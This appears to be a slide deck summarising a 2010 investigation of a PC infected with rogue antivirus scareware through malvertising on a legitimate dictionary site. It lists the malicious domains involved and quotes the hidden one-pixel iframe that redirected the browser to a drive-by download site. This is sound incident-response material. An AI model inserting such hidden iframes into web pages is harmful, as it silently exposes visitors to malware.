170 likes | 269 Views
Infected PC Investigation Summary. 6/8/10 infection. The story you are about to hear is true. Only the names have been changed to protect the innocent. Hello,
E N D
Infected PC Investigation Summary 6/8/10 infection
The story you are about to hear is true. Only the names have been changed to protect the innocent.
Hello, A user’s pc has been infected with a rogue antispyware called AV security Suite, keeps coming up with bogus viruses and basically has taken over the system. The network has been disconnected, the incident started yesterday 6/08/10, around 4:25 pm. User has access to level 2 protected info, but does not keep any of that info on her pc. Thanks, Tech Guy
User visited legitimate, medical-dictionary.thefreedictionary.com • Site served up advertising through interclick.com • One of the advertising pulls came from a known "Malvertising" domain h7.ch.adtech.com.niklip.com. Malvertising domains serve up obfuscated JavaScript that redirects browsers to malware “check-in” sites.
Immediately after this pull, a request was made to a known malware "check-in” site statsoplex.co.cc which returned a hidden iframe. Malware check-in sites redirect browsers to SEO (Search Engine Optimization) Exploit drive-by sites.
The iframe <html> <body> <iframesrc="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe> </body> </html>
The iframe loaded a scareware A/V page from a known SEO Exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malware JavaScript.
Two seconds later, the JavaScript that came from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be an infected SWF. An infected PDF was also downloaded.
The Malware Distribution Site • Reverse lookup on 188.65.x.x • protect-ware.com • "Antispyware Soft - Powerfull PC Protection !"
Interesting factoid • All 4 of the above domains were registered within a month of the infection via a Chinese registrar, todaynic.com. • Registrant addresses were in Lithuania, Russia, and Pennsylvania. • IP addresses were in Austria, Belgium, Sweden
Another interesting factoid • Study by Avast! (A/V software) found that for every 1 infected adult site there were 99 other legitimate sites that were infected.
Sites that are known to have been referring clients to malicious advertising services related to this incident • ad.ca.doubleclick.net • ad.doubleclick.net • canada.com • dailymail.co.uk • dailyradar.com • edmontonjournal.com • financialpost.com • google.com • history.com • montrealgazette.com • nasdaq.com • orbitz.com • sportsfanlive.com • tennessean.com • thestarphoenix.com • usatoday.com • vancouversun.com • windsorstar.com
The PC • XP SP3, fully patched • McAfee 8.7 with current engine and signatures • Updated Adobe Reader
The Malware • All JavaScript was obfuscated • The Payload was downloaded without user interaction • Primarily scareware – attempted to convince the user that Antivirus Soft could disinfect and protect her PC • Pretty convincing Product image and System Tray icon. Would have fooled most users.
The Malware • When the malware was uploaded to virustotal.com, only 3/41 products detected (McAfee did not detect) • Next day, detection rate increased to 19/41, this time including McAfee
Results • No indication from firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software • PC was wiped, reloaded, and returned to the user